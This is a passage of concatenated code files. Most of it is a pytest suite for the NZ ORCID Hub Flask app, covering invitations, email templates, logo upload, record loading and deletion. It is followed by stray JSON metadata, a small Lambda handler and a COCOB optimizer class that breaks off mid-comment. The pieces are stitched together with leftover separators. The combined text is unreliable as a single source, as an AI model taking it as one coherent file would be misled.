rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/funding_record_activate_for_batch")
def test_logo(request_ctx):
"""Test manage organisation 'logo'."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx("/settings/logo", method="POST") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
with request_ctx("/logo/token_123") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.endswith("images/banner-small.png")
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_manage_email_template(patch, request_ctx):
"""Test manage organisation invitation email template."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "TEST APP",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"email_template": "enable",
"save": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"Are you sure?" in rv.data
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "<NAME>",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"email_template": "enable {MESSAGE} {INCLUDED_URL}",
"save": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
org = Organisation.get(id=org.id)
assert org.email_template == "enable {MESSAGE} {INCLUDED_URL}"
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "<NAME>",
"email_template_enabled": "true",
"email_address": "<EMAIL>",
"send": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
def send_mail_mock(*argvs, **kwargs):
"""Mock email invitation."""
logger.info(f"***\nActually email invitation was mocked, so no email sent!!!!!")
return True
def test_invite_user(request_ctx):
"""Test invite a researcher to join the hub."""
org = Organisation.get(name="TEST0")
admin = User.get(email="<EMAIL>")
user = User.create(
email="<EMAIL>",
name="<NAME>",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, affiliations=Affiliation.EMP)
UserInvitation.create(
invitee=user,
inviter=admin,
org=org,
email="<EMAIL>",
token="<PASSWORD>")
with request_ctx("/invite/user") as ctx:
login_user(admin, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert org.name.encode() in rv.data
with request_ctx(
"/invite/user",
method="POST",
data={
"name": "<NAME>",
"is_employee": "false",
"email_address": "<EMAIL>",
"resend": "enable",
"is_student": "true",
"first_name": "test",
"last_name": "test",
"city": "test"
}) as ctx, patch("orcid_hub.views.send_user_invitation.queue") as queue_send_user_invitation:
login_user(admin, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
queue_send_user_invitation.assert_called_once()
with patch("orcid_hub.orcid_client.MemberAPI") as m, patch(
"orcid_hub.orcid_client.SourceClientId"), request_ctx(
"/invite/user",
method="POST",
data={
"name": "<NAME>",
"is_employee": "false",
"email_address": "<EMAIL>",
"resend": "enable",
"is_student": "true",
"first_name": "test",
"last_name": "test",
"city": "test"}) as ctx:
login_user(admin, remember=True)
OrcidToken.create(access_token="<PASSWORD>", user=user, org=org, scope="/read-limited,/activities/update",
expires_in='121')
api_mock = m.return_value
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
api_mock.create_or_update_affiliation.assert_called_once()
def test_email_template(app, request_ctx):
"""Test email maintenance."""
org = Organisation.get(name="TEST0")
user = User.get(email="<EMAIL>")
with request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"prefill": "Pre-fill",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data
org.reload()
assert not org.email_template_enabled
with patch("orcid_hub.utils.send_email") as send_email, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE {EMAIL}",
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert not org.email_template_enabled
send_email.assert_called_once_with(
"email/test.html",
base="TEST TEMPLATE {EMAIL}",
cc_email=("TEST ORG #0 ADMIN", "<EMAIL>"),
logo=None,
org_name="TEST0",
recipient=("TEST ORG #0 ADMIN", "<EMAIL>"),
reply_to=("TEST ORG #0 ADMIN", "<EMAIL>"),
sender=("TEST ORG #0 ADMIN", "<EMAIL>"),
subject="TEST EMAIL")
with request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE TO SAVE {MESSAGE} {INCLUDED_URL}",
"save": "Save",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
assert "TEST TEMPLATE TO SAVE {MESSAGE} {INCLUDED_URL}" in org.email_template
with patch("emails.message.Message") as msg_cls, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": app.config["DEFAULT_EMAIL_TEMPLATE"],
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
msg_cls.assert_called_once()
_, kwargs = msg_cls.call_args
assert kwargs["subject"] == "TEST EMAIL"
assert kwargs["mail_from"] == (
"NZ ORCID HUB",
"<EMAIL>",
)
assert "<!DOCTYPE html>\n<html>\n" in kwargs["html"]
assert "TEST0" in kwargs["text"]
org.logo = File.create(
filename="LOGO.png",
data=b"000000000000000000000",
mimetype="image/png",
token="TOKEN000")
org.save()
user.reload()
with patch("orcid_hub.utils.send_email") as send_email, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE {EMAIL}",
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
send_email.assert_called_once_with(
"email/test.html",
base="TEST TEMPLATE {EMAIL}",
cc_email=("TEST ORG #0 ADMIN", "<EMAIL>"),
logo=f"http://{ctx.request.host}/logo/TOKEN000",
org_name="TEST0",
recipient=("TEST ORG #0 ADMIN", "<EMAIL>"),
reply_to=("TEST ORG #0 ADMIN", "<EMAIL>"),
sender=("TEST ORG #0 ADMIN", "<EMAIL>"),
subject="TEST EMAIL")
def test_logo_file(request_ctx):
"""Test logo support."""
org = Organisation.get(name="TEST0")
user = User.get(email="<EMAIL>")
with request_ctx(
"/settings/logo",
method="POST",
data={
"upload": "Upload",
"logo_file": (
BytesIO(b"FAKE IMAGE"),
"logo.png",
),
}) as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
org.reload()
assert org.logo is not None
assert org.logo.filename == "logo.png"
with request_ctx(
"/settings/logo",
method="POST",
data={
"reset": "Reset",
}) as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
org.reload()
assert org.logo is None
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_invite_organisation(send_email, request_ctx):
"""Test invite an organisation to register."""
org = Organisation.get(name="TEST0")
root = User.get(email="<EMAIL>")
user = User.create(
email="<EMAIL>", name="TEST USER", confirmed=True, organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/invite/organisation",
method="POST",
data={
"org_name": "THE ORGANISATION",
"org_email": "<EMAIL>",
"tech_contact": "True",
"via_orcid": "True",
"first_name": "xyz",
"last_name": "xyz",
"city": "xyz"
}) as ctx:
login_user(root, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
send_email.assert_called_once()
with request_ctx(
"/invite/organisation",
method="POST",
data={
"org_name": "ORG NAME",
"org_email": "<EMAIL>",
"tech_contact": "True",
"via_orcid": "True",
"first_name": "xyz",
"last_name": "xyz",
"city": "xyz"
}) as ctx:
send_email.reset_mock()
login_user(root, remember=True)
org = Organisation.get(id=1)
org.name = "ORG NAME"
org.confirmed = True
org.save()
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
send_email.assert_called_once()
def core_mock(self=None, source_file=None, schema_files=None, source_data=None, schema_data=None, extensions=None,
strict_rule_validation=False,
fix_ruby_style_regex=False, allow_assertions=False, ):
"""Mock validation api call."""
return None
def validate(self=None, raise_exception=True):
"""Mock validation api call."""
return False
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_funding(patch, patch2, request_ctx):
"""Test preload organisation data."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.ADMIN,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/load/researcher/funding",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier":"00001", "email": "<EMAIL>",'
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code":null}],'
b'"title": { "title": { "value": "1ral"}},"short-description": "Mi","type": "CONTRACT",'
b'"contributors": {"contributor": [{"contributor-attributes": {"contributor-role": '
b'"co_lead"},"credit-name": {"value": "firentini"}}]}'
b', "external-ids": {"external-id": [{"external-id-value": '
b'"GNS170661","external-id-type": "grant_number"}]}}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# Funding file successfully loaded.
assert "task_id" in rv.location
assert "funding" in rv.location
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_work(patch, patch2, request_ctx):
"""Test preload work data."""
user = User.get(email="<EMAIL>")
user.roles = Role.ADMIN
user.save()
with request_ctx(
"/load/researcher/work",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier":"00001", "email": "<EMAIL>",'
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code":null}],'
b'"title": { "title": { "value": "1ral"}}, "citation": {"citation-type": '
b'"FORMATTED_UNSPECIFIED", "citation-value": "This is citation value"}, "type": "BOOK_CHR",'
b'"contributors": {"contributor": [{"contributor-attributes": {"contributor-role": '
b'"AUTHOR", "contributor-sequence" : "1"},"credit-name": {"value": "firentini"}}]}'
b', "external-ids": {"external-id": [{"external-id-value": '
b'"GNS170661","external-id-type": "grant_number"}]}}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# Work file successfully loaded.
assert "task_id" in rv.location
assert "work" in rv.location
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_peer_review(patch, patch2, request_ctx):
"""Test preload peer review data."""
user = User.get(email="<EMAIL>")
user.roles = Role.ADMIN
user.save()
with request_ctx(
"/load/researcher/peer_review",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier": "00001", "email": "<EMAIL>", '
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code": null}]'
b', "reviewer-role": "REVIEWER", "review-identifiers": { "external-id": [{ '
b'"external-id-type": "source-work-id", "external-id-value": "1212221", "external-id-url": '
b'{"value": "https://localsystem.org/1234"}, "external-id-relationship": "SELF"}]}, '
b'"review-type": "REVIEW", "review-group-id": "issn:90122", "subject-container-name": { '
b'"value": "Journal title"}, "subject-type": "JOURNAL_ARTICLE", "subject-name": { '
b'"title": {"value": "Name of the paper reviewed"}},"subject-url": { '
b'"value": "https://subject-alt-url.com"}, "convening-organization": { "name": '
b'"The University of Auckland", "address": { "city": "Auckland", "region": "Auckland",'
b' "country": "NZ" } }}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# peer-review file successfully loaded.
assert "task_id" in rv.location
assert "peer" in rv.location
def test_load_researcher_affiliations(request_ctx):
"""Test preload organisation data."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.ADMIN,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
form = FileUploadForm()
form.file_.name = "conftest.py"
with request_ctx("/load/researcher", method="POST", data={"file_": "{'filename': 'xyz.json'}",
"email": user.email, form: form}) as ctxx:
login_user(user, remember=True)
rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert user.email.encode() in rv.data
def test_edit_record(request_ctx):
"""Test create a new or edit an existing profile section record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
admin.organisation.orcid_client_id = "ABC123"
admin.organisation.save()
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
fake_response = make_response
fake_response.status = 201
fake_response.headers = {'Location': '12344/xyz/12399'}
OrcidToken.create(user=user, org=user.organisation, access_token="ABC123", scope="/read-limited,/activities/update")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_employment",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_employment, request_ctx(f"/section/{user.id}/EMP/1212/edit") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_employment.assert_called_once_with("XXXX-XXXX-XXXX-0001", 1212)
with patch.object(
orcid_client.MemberAPIV20Api,
"view_education",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_education, request_ctx(f"/section/{user.id}/EDU/1234/edit") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_education.assert_called_once_with("XXXX-XXXX-XXXX-0001", 1234)
with patch.object(
orcid_client.MemberAPIV20Api, "create_education",
MagicMock(return_value=fake_response)), request_ctx(
f"/section/{user.id}/EDU/new",
method="POST",
data={
"city": "Auckland",
"country": "NZ",
"org_name": "TEST",
}) as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EDU/list"
affiliation_record = UserOrgAffiliation.get(user=user)
# checking if the UserOrgAffiliation record is updated with put_code supplied from fake response
assert 12399 == affiliation_record.put_code
def test_delete_employment(request_ctx, app):
"""Test delete an employment record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location.startswith("/?next=")
with request_ctx(f"/section/99999999/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/admin/viewmembers/"
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
admin.organisation.orcid_client_id = "ABC123"
admin.organisation.save()
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
token = OrcidToken.create(
user=user, org=user.organisation, access_token="ABC123", scope="/read-limited")
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
token.scope = "/read-limited,/activities/update"
token.save()
with patch.object(
orcid_client.MemberAPIV20Api,
"delete_employment",
MagicMock(
return_value='{"test": "TEST1234567890"}')) as delete_employment, request_ctx(
f"/section/{user.id}/EMP/12345/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
delete_employment.assert_called_once_with("XXXX-XXXX-XXXX-0001", 12345)
with patch.object(
orcid_client.MemberAPIV20Api,
"delete_education",
MagicMock(return_value='{"test": "TEST1234567890"}')) as delete_education, request_ctx(
f"/section/{user.id}/EDU/54321/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
delete_education.assert_called_once_with("XXXX-XXXX-XXXX-0001", 54321)
def test_viewmembers(request_ctx):
"""Test affilated researcher view."""
non_admin = User.get(email="<EMAIL>")
with request_ctx("/admin/viewmembers") as ctx:
login_user(non_admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
admin = User.get(email="<EMAIL>")
with request_ctx("/admin/viewmembers") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<EMAIL>" in resp.data
with request_ctx("/admin/viewmembers/?flt1_0=2018-05-01+to+2018-05-31&flt2_1=2018-05-01+to+2018-05-31") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<EMAIL>" not in resp.data
with request_ctx(f"/admin/viewmembers/edit/?id={non_admin.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert non_admin.email.encode() in resp.data
assert non_admin.name.encode() in resp.data
with request_ctx(f"/admin/viewmembers/edit/?id=9999999999") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
user2 = User.get(email="<EMAIL>")
with request_ctx(f"/admin/viewmembers/edit/?id={user2.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 403
def test_viewmembers_delete(request_ctx):
"""Test affilated researcher deletion via the view."""
admin0 = User.get(email="<EMAIL>")
admin1 = User.get(email="<EMAIL>")
researcher0 = User.get(email="<EMAIL>")
researcher1 = User.get(email="<EMAIL>")
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher1.id),
"url": "/admin/viewmembers/",
}) as ctx: # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 403
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher0.id),
"url": "/admin/viewmembers/",
}) as ctx, patch(
"orcid_hub.views.AppModelView.on_model_delete",
create=True,
side_effect=Exception("FAILURED")), patch(
"orcid_hub.views.AppModelView.handle_view_exception",
create=True,
return_value=False): # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/admin/viewmembers/"
assert User.select().where(User.id == researcher0.id).count() == 1
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher0.id),
"url": "/admin/viewmembers/",
}) as ctx: # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
with pytest.raises(User.DoesNotExist):
User.get(id=researcher0.id)
UserOrg.create(org=admin0.organisation, user=researcher1)
OrcidToken.create(org=admin0.organisation, user=researcher1, access_token="ABC<PASSWORD>")
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher1.id),
"url": "/admin/viewmembers/",
}) as ctx, patch("orcid_hub.views.requests.post") as mockpost: # noqa: F405
org = researcher1.organisation
mockpost.return_value = MagicMock(status_code=400)
login_user(admin1)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 2
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 1
mockpost.side_effect = Exception("FAILURE")
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 2
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 1
mockpost.reset_mock(side_effect=True)
mockpost.return_value = MagicMock(status_code=200)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 1
args, kwargs = mockpost.call_args
assert args[0] == ctx.app.config["ORCID_BASE_URL"] + "oauth/revoke"
data = kwargs["data"]
assert data["client_id"] == "ABC123"
assert data["client_secret"] == "SECRET-12345"
assert data["token"].startswith("TOKEN-1")
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 0
def test_reset_all(request_ctx):
"""Test reset batch process."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid=123,
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
task1 = Task.create(
id=1,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=0)
AffiliationRecord.create(
is_active=True,
task=task1,
external_id="Test",
first_name="Test",
last_name="Test",
email="<EMAIL>",
orcid="123112311231",
organisation="asdasd",
affiliation_type="staff",
role="Test",
department="Test",
city="Test",
state="Test",
country="Test",
disambiguated_id="Test",
disambiguation_source="Test")
UserInvitation.create(
invitee=user,
inviter=user,
org=org,
task=task1,
email="<EMAIL>",
token="<PASSWORD>")
task2 = Task.create(
id=2,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=1)
FundingRecord.create(
task=task2,
title="Test titile",
translated_title="Test title",
translated_title_language_code="Test",
type="GRANT",
organization_defined_type="Test org",
short_description="Test desc",
amount="1000",
currency="USD",
org_name="Test_orgname",
city="Test city",
region="Test",
country="Test",
disambiguated_org_identifier="Test_dis",
disambiguation_source="Test_source",
is_active=True,
visibility="Test_visibity")
task3 = Task.create(
id=3,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=3)
PeerReviewRecord.create(
id=1,
task=task3,
review_group_id=1212,
is_active=True,
visibility="Test_visibity")
work_task = Task.create(
id=4,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=2)
WorkRecord.create(
id=1,
task=work_task,
title=1212,
is_active=True,
citation_type="Test_citation_type",
citation_value="Test_visibity")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/affiliation_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task1.id)])
rv = ctxx.app.full_dispatch_request()
t = Task.get(id=1)
ar = AffiliationRecord.get(id=1)
assert "The record was reset" in ar.status
assert t.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/affiliation_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/funding_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task2.id)])
rv = ctxx.app.full_dispatch_request()
t2 = Task.get(id=2)
fr = FundingRecord.get(id=1)
assert "The record was reset" in fr.status
assert t2.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/funding_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/peer_review_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', task3.id)])
rv = ctxx.app.full_dispatch_request()
t2 = Task.get(id=3)
pr = PeerReviewRecord.get(id=1)
assert "The record was reset" in pr.status
assert t2.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/peer_review_record_reset_for_batch")
with request_ctx("/reset_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/work_record_reset_for_batch')])
request.form = ImmutableMultiDict([('task_id', work_task.id)])
rv = ctxx.app.full_dispatch_request()
t = Task.get(id=4)
pr = WorkRecord.get(id=1)
assert "The record was reset" in pr.status
assert t.completed_at is None
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/work_record_reset_for_batch")
def test_issue_470198698(request_ctx):
"""Test regression https://sentry.io/royal-society-of-new-zealand/nz-orcid-hub/issues/470198698/."""
from bs4 import BeautifulSoup
admin = User.get(email="<EMAIL>")
org = admin.organisation
task = Task.create(org=org, filename="TEST000.csv", user=admin)
AffiliationRecord.insert_many(
dict(
task=task,
orcid=f"XXXX-XXXX-XXXX-{i:04d}" if i % 2 else None,
first_name=f"FN #{i}",
last_name=f"LF #{i}",
email=f"test{i}") for i in range(10)).execute()
with request_ctx(f"/admin/affiliationrecord/?task_id={task.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
soup = BeautifulSoup(resp.data, "html.parser")
orcid_col_idx = next(i for i, h in enumerate(soup.thead.find_all("th"))
if "col-orcid" in h["class"]) - 2
with request_ctx(f"/admin/affiliationrecord/?sort={orcid_col_idx}&task_id={task.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
soup = BeautifulSoup(resp.data, "html.parser")
orcid_column = soup.find(class_="table-responsive").find_all(class_="col-orcid")
assert orcid_column[-1].text.strip() == "XXXX-XXXX-XXXX-0009"
with request_ctx("/admin/affiliationrecord/") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
with request_ctx(f"/admin/affiliationrecord/?task_id=99999999") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
``` |
{
"source": "jpeezy-undaunted/cil-internship-cohort-02",
"score": 2
} |
#### File: Module 2 Task/LambdaCFTUsingS3Bucket/index.py
```python
def lambda_handler(event, context):
print('THIS IS LAMBDA CREATED FROM CLOUDFORMATION')
return 'success'
``` |
{
"source": "jpeg729/pytorch-bits",
"score": 3
} |
#### File: pytorch-bits/optim/cocob.py
```python
import torch
from torch.optim.optimizer import Optimizer, required
class COCOB(Optimizer):
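    """COCOB-Backprop optimizer (learning-rate-free, per-coordinate coin betting).

    This appears to follow Orabona & Tommasi, "Training Deep Networks without
    Learning Rates Through Coin Betting" (NIPS 2017); see the comments in step()
    for the update actually computed here.

    Args:
        params: iterable of parameters to optimize.
        alpha: cap multiplier on the betting fraction (default 100).
        weight_decay: optional L2 penalty added to the gradient (default off).
    """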
def __init__(self, params, alpha=100, weight_decay=False):
defaults = dict(alpha=alpha, weight_decay=weight_decay)
super(COCOB, self).__init__(params, defaults)
def __setstate__(self, state):
super(COCOB, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
alpha = group['alpha']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if group['weight_decay'] != 0:
d_p.add_(group['weight_decay'], p.data)
state = self.state[p]
if len(state) == 0:
state['L'] = torch.zeros_like(p.data)
state['gradients_sum'] = torch.zeros_like(p.data)
state['grad_norm_sum'] = torch.zeros_like(p.data)
state['reward'] = torch.zeros_like(p.data)
state['w'] = torch.zeros_like(p.data)
L = state['L']
reward = state['reward']
gradients_sum = state['gradients_sum']
grad_norm_sum = state['grad_norm_sum']
old_w = state['w']
torch.max(L, torch.abs(d_p), out=L)
                torch.max(reward - old_w * d_p, torch.zeros_like(reward), out=reward)  # clamp the reward at zero; zeros_like keeps device/dtype consistent with reward
gradients_sum.add_(d_p)
grad_norm_sum.add_(torch.abs(d_p))
# the paper sets weights_t = weights_1 + new_w
# we use the equivalent formula: weights_t = weights_tm1 - old_w + new_w
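                # spelled out, the per-coordinate update computed on the next line is
                # (mirroring this implementation rather than the paper's exact notation):
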